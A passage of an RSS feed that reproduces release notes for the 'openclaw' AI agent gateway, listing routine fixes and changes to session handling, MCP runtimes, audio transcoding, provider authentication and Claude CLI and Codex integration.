<li>Sessions/browser: close tracked browser tabs when idle, daily, <code>/new</code>, or <code>/reset</code> session rollover archives the previous transcript, preventing tabs from leaking past the old session. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jakozloski/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jakozloski">@jakozloski</a>.</li>
<li>Sessions/forking: fall back to transcript-estimated parent token counts when cached totals are stale or missing, so oversized thread forks start fresh instead of cloning the full parent transcript. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jalehman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jalehman">@jalehman</a>.</li>
<li>OpenAI/Codex: send Codex Responses system prompts through top-level <code>instructions</code> while preserving the existing native Codex payload controls.</li>
<li>MCP/CLI: retire bundled MCP runtimes at the end of one-shot <code>openclaw agent</code> and <code>openclaw infer model run</code> gateway/local executions, so repeated scripted runs do not accumulate stdio MCP child processes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327469009" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71457" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71457/hovercard" href="https://github.com/openclaw/openclaw/issues/71457">#71457</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/spartoviMD/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/spartoviMD">@spartoviMD</a>.</li>
<li>OpenAI/Codex image generation: canonicalize legacy <code>openai-codex.baseUrl</code> values such as <code>https://chatgpt.com/backend-api</code> to the Codex Responses backend before calling <code>gpt-image-2</code>, matching the chat transport. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327474967" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71460" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71460/hovercard" href="https://github.com/openclaw/openclaw/issues/71460">#71460</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/GodsBoy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/GodsBoy">@GodsBoy</a>.</li>
<li>Control UI: make <code>/usage</code> use the fresh context snapshot for context percentage, and include cache-write tokens in the Usage overview cache-hit denominator. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4080148005" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47885" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47885/hovercard" href="https://github.com/openclaw/openclaw/issues/47885">#47885</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/imwyvern/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/imwyvern">@imwyvern</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ante042/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ante042">@Ante042</a>.</li>
<li>GitHub Copilot: preserve encrypted Responses reasoning item IDs during replay so Copilot can validate encrypted reasoning payloads across requests. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327393792" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71448" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71448/hovercard" href="https://github.com/openclaw/openclaw/pull/71448">#71448</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/a410979729-sys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/a410979729-sys">@a410979729-sys</a>.</li>
<li>GitHub Copilot: never rewrite connection-bound reasoning item IDs regardless of whether <code>encrypted_content</code> is present, fixing a 400 "Encrypted content item_id did not match" error with <code>gpt-5.3-codex</code> and future Codex models that fall through to the forward-compat catch-all with <code>reasoning: false</code>. Also recognize Codex-named models as reasoning-capable so they inherit the correct capability flags. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289536760" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68735" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68735/hovercard" href="https://github.com/openclaw/openclaw/issues/68735">#68735</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/InvalidPandaa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/InvalidPandaa">@InvalidPandaa</a>.</li>
<li>Agents/replies: recover final-answer text when streamed assistant chunks contain only whitespace, preventing completed turns from surfacing as empty-payload errors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327458962" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71454" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71454/hovercard" href="https://github.com/openclaw/openclaw/issues/71454">#71454</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327500044" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71467" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71467/hovercard" href="https://github.com/openclaw/openclaw/pull/71467">#71467</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sanjays2402/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sanjays2402">@Sanjays2402</a>.</li>
<li>Feishu/TTS: transcode voice-intent MP3 and other audio replies to Ogg/Opus before sending native Feishu audio bubbles, while keeping ordinary MP3 attachments as files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206957369" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61249" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61249/hovercard" href="https://github.com/openclaw/openclaw/issues/61249">#61249</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4034320677" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/37868" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/37868/hovercard" href="https://github.com/openclaw/openclaw/issues/37868">#37868</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sg1416-zg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sg1416-zg">@sg1416-zg</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ycjlb2023-peteryi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ycjlb2023-peteryi">@ycjlb2023-peteryi</a>.</li>
<li>WhatsApp/TTS: transcode MP3/WebM audio, including Microsoft Edge TTS output, to Ogg/Opus before sending PTT voice notes.</li>
<li>QQBot/TTS: honor plain <code>audioAsVoice</code> replies by synthesizing TTS to native QQ voice messages, and mark inbound voice-only messages as audio media without exposing raw voice paths to generic media context.</li>
<li>Providers/SenseAudio: add bundled SenseAudio batch audio transcription through <code>tools.media.audio</code> with <code>SENSEAUDIO_API_KEY</code> auth. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265936553" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66943" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66943/hovercard" href="https://github.com/openclaw/openclaw/pull/66943">#66943</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Fl0rencess720/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Fl0rencess720">@Fl0rencess720</a>.</li>
<li>Providers/MiniMax: let TTS use MiniMax portal OAuth and Token Plan credentials before falling back to <code>MINIMAX_API_KEY</code>, and include current TTS HD model ids. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4141517456" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55017" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55017/hovercard" href="https://github.com/openclaw/openclaw/issues/55017">#55017</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zx15210404690-hash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zx15210404690-hash">@zx15210404690-hash</a>.</li>
<li>Telegram/webhook: acknowledge validated webhook updates before running bot middleware, keeping slow agent turns from tripping Telegram delivery retries while preserving per-chat processing lanes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326997239" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71392" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71392/hovercard" href="https://github.com/openclaw/openclaw/issues/71392">#71392</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joelforsberg46-source/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joelforsberg46-source">@joelforsberg46-source</a>.</li>
<li>MCP/config reload: hot-apply <code>mcp.*</code> changes by disposing cached session MCP runtimes, and dispose bundled MCP runtimes during gateway shutdown so removed <code>mcp.servers</code> entries reap child processes promptly. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4203179674" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60656" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60656/hovercard" href="https://github.com/openclaw/openclaw/issues/60656">#60656</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xieyuanqing/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xieyuanqing">@xieyuanqing</a>.</li>
<li>Active Memory: keep silent recall sub-agent billing/auth failures out of shared auth-profile cooldown state, so a Claude CLI extra-usage rejection cannot disable normal Claude-backed turns. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325943036" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71284" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71284/hovercard" href="https://github.com/openclaw/openclaw/issues/71284">#71284</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327867252" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71539" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71539/hovercard" href="https://github.com/openclaw/openclaw/pull/71539">#71539</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vishutdhar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vishutdhar">@vishutdhar</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Auth/Claude CLI: sync refreshed Claude CLI OAuth credentials into the managed auth profile so long-running Claude CLI runs stop falling back to stale OpenClaw snapshots. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320240541" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70902" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70902/hovercard" href="https://github.com/openclaw/openclaw/pull/70902">#70902</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/starvex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/starvex">@starvex</a>.</li>
<li>Sessions: make <code>sessions_spawn(mode="session")</code> errors name usable alternatives when the current channel cannot bind subagent threads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4271801625" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67400" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67400/hovercard" href="https://github.com/openclaw/openclaw/issues/67400">#67400</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4277983433" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67790" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67790/hovercard" href="https://github.com/openclaw/openclaw/pull/67790">#67790</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stainlu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stainlu">@stainlu</a>.</li>
<li>Agents/Claude CLI: pass the OpenClaw system prompt through Claude's prompt-file flag so Windows runs avoid argv length failures without changing system prompt semantics. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4292748556" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69158" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69158/hovercard" href="https://github.com/openclaw/openclaw/issues/69158">#69158</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293340040" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69211" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69211/hovercard" href="https://github.com/openclaw/openclaw/pull/69211">#69211</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/skylee-01/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/skylee-01">@skylee-01</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cassioanorte/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cassioanorte">@cassioanorte</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Syu0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Syu0">@Syu0</a>, and @Stache73.</li>
<li>Agents/CLI sessions: bind <code>google-gemini-cli</code> session auth-epoch to the Google account identity in <code>~/.gemini/oauth_creds.json</code>, so Gemini-backed agents resume their conversation after gateway restart instead of minting a fresh session, and stale bindings are invalidated when the authenticated Google account changes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4321086277" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70973" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70973/hovercard" href="https://github.com/openclaw/openclaw/issues/70973">#70973</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4322606915" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71076" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71076/hovercard" href="https://github.com/openclaw/openclaw/pull/71076">#71076</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a>.</li>
<li>Slack: stop treating user mentions in assistant-authored message edit blocks as sender attribution, preventing edited bot messages from spoofing a mentioned DM user. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328906494" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71700" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71700/hovercard" href="https://github.com/openclaw/openclaw/pull/71700">#71700</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Codex: consume unauthorized bound conversation inbound claims before they can fall through to other claim handlers or enqueue Codex turns. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328907337" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71702" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71702/hovercard" href="https://github.com/openclaw/openclaw/pull/71702">#71702</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Codex media understanding: require approval-checked app-server image turns while explicitly declining tool, file, permission, and elicitation approval requests for the bounded image worker. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328907702" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71703" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71703/hovercard" href="https://github.com/openclaw/openclaw/pull/71703">#71703</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/Claude CLI: allow large live <code>stream-json</code> JSONL lines up to the existing per-turn raw limit, preventing large Telegram, WebChat, MCP, and image turns from aborting on the old stdout buffer cap. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329383401" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71793" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71793/hovercard" href="https://github.com/openclaw/openclaw/issues/71793">#71793</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4322675128" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71080" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71080/hovercard" href="https://github.com/openclaw/openclaw/issues/71080">#71080</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318647707" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70766" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70766/hovercard" href="https://github.com/openclaw/openclaw/issues/70766">#70766</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329830196" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71897" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71897/hovercard" href="https://github.com/openclaw/openclaw/pull/71897">#71897</a>) Thanks @chacher86, @shivamgrover21, and @tpjordan.</li>
<li>Agents/Claude CLI: unwrap nested Claude result envelopes in CLI JSON output so delegated agent responses surface as final text instead of raw result JSON. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264813860" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66819" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66819/hovercard" href="https://github.com/openclaw/openclaw/pull/66819">#66819</a>) Thanks @mraleko.</li>
<li>Agents/Claude CLI: apply the configured 1M context window override to eligible Claude CLI Opus and Sonnet models when <code>context1m</code> is enabled. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319842892" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70863" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70863/hovercard" href="https://github.com/openclaw/openclaw/pull/70863">#70863</a>) Thanks @bidadh.</li>
<li>Models/status: report fresh Claude CLI native auth instead of stale stored <code>anthropic:claude-cli</code> profile expiry when local credentials are current. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325517974" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71256" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71256/hovercard" href="https://github.com/openclaw/openclaw/issues/71256">#71256</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326550173" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71332" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71332/hovercard" href="https://github.com/openclaw/openclaw/pull/71332">#71332</a>) Thanks @matthiasjanke and @neeravmakwana.</li>
<li>CLI backends: compact OpenClaw transcripts after over-budget CLI turns and reseed fresh CLI sessions from the compacted transcript instead of stale external resume state. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285899710" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68329" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68329/hovercard" href="https://github.com/openclaw/openclaw/issues/68329">#68329</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329888680" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71916" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71916/hovercard" href="https://github.com/openclaw/openclaw/pull/71916">#71916</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Telegram: keep default tool progress messages visible when answer preview streaming is disabled. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329509796" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71825" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71825/hovercard" href="https://github.com/openclaw/openclaw/pull/71825">#71825</a>) Thanks @VACInc.</li>
<li>Configure/models: clear deselected model fallbacks when updating the model picker allowlist, including provider-scoped setup flows. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328198274" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71596" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71596/hovercard" href="https://github.com/openclaw/openclaw/pull/71596">#71596</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rubencu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rubencu">@rubencu</a>.</li>
<li>Agents/streaming: strip namespaced <code>&lt;antml:thinking&gt;</code> reasoning tags from streamed assistant replies before user-visible text is emitted. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4294779031" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69288" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69288/hovercard" href="https://github.com/openclaw/openclaw/pull/69288">#69288</a>) Thanks @xialonglee.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.4.20-beta.2]]></title>
<description><![CDATA[2026.4.20
Changes

Onboard/wizard: restyle the setup security disclaimer with a single yellow warning banner, section headings and bulleted checklists, and un-dim the note body so key guidance is easy to scan; add a loading spinner during the initial model catalog load so the wizard no longer goe...]]></description>
<link>https://tsecurity.de/de/3460970/downloads/openclaw-2026420-beta2/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3460970/downloads/openclaw-2026420-beta2/</guid>
<pubDate>Fri, 24 Apr 2026 12:30:59 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.4.20</h2>
<h3>Changes</h3>
<ul>
<li>Onboard/wizard: restyle the setup security disclaimer with a single yellow warning banner, section headings and bulleted checklists, and un-dim the note body so key guidance is easy to scan; add a loading spinner during the initial model catalog load so the wizard no longer goes blank while it runs; add an "API key" placeholder to provider API key prompts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4299967312" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69553" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69553/hovercard" href="https://github.com/openclaw/openclaw/pull/69553">#69553</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Patrick-Erichsen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Patrick-Erichsen">@Patrick-Erichsen</a>.</li>
<li>Agents/prompts: strengthen the default system prompt and OpenAI GPT-5 overlay with clearer completion bias, live-state checks, weak-result recovery, and verification-before-final guidance.</li>
<li>Models/costs: support tiered model pricing from cached catalogs and configured models, and include bundled Moonshot Kimi K2.6/K2.5 cost estimates for token-usage reports. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4274674484" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67605" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67605/hovercard" href="https://github.com/openclaw/openclaw/pull/67605">#67605</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sliverp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sliverp">@sliverp</a>.</li>
<li>Sessions/Maintenance: enforce the built-in entry cap and age prune by default, and prune oversized stores at load time so accumulated cron/executor session backlogs cannot OOM the gateway before the write path runs. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4297469520" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69404" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69404/hovercard" href="https://github.com/openclaw/openclaw/pull/69404">#69404</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bobrenze-bot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bobrenze-bot">@bobrenze-bot</a>.</li>
<li>Plugins/tests: reuse plugin loader alias and Jiti config resolution across repeated same-context loads, reducing import-heavy test overhead. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4295386124" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69316" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69316/hovercard" href="https://github.com/openclaw/openclaw/pull/69316">#69316</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Cron: split runtime execution state into <code>jobs-state.json</code> so <code>jobs.json</code> stays stable for git-tracked job definitions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4223895311" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63105" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63105/hovercard" href="https://github.com/openclaw/openclaw/pull/63105">#63105</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Feelw00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Feelw00">@Feelw00</a>.</li>
<li>Agents/compaction: send opt-in start and completion notices during context compaction. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4278631167" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67830" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67830/hovercard" href="https://github.com/openclaw/openclaw/pull/67830">#67830</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/feniix/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/feniix">@feniix</a>.</li>
<li>Moonshot/Kimi: default bundled Moonshot setup, web search, and media-understanding surfaces to <code>kimi-k2.6</code> while keeping <code>kimi-k2.5</code> available for compatibility. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4298970170" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69477" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69477/hovercard" href="https://github.com/openclaw/openclaw/pull/69477">#69477</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/scoootscooob/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/scoootscooob">@scoootscooob</a>.</li>
<li>Moonshot/Kimi: allow <code>thinking.keep = "all"</code> on <code>moonshot/kimi-k2.6</code>, and strip it for other Moonshot models or requests where pinned <code>tool_choice</code> disables thinking. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289905771" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68816" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68816/hovercard" href="https://github.com/openclaw/openclaw/pull/68816">#68816</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aniaan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aniaan">@aniaan</a>.</li>
<li>BlueBubbles/groups: forward per-group <code>systemPrompt</code> config into inbound context <code>GroupSystemPrompt</code> so configured group-specific behavioral instructions (for example threaded-reply and tapback conventions) are injected on every turn. Supports <code>"*"</code> wildcard fallback matching the existing <code>requireMention</code> pattern. Closes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4203322859" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60665" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60665/hovercard" href="https://github.com/openclaw/openclaw/issues/60665">#60665</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293153243" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69198" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69198/hovercard" href="https://github.com/openclaw/openclaw/pull/69198">#69198</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/omarshahine/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/omarshahine">@omarshahine</a>.</li>
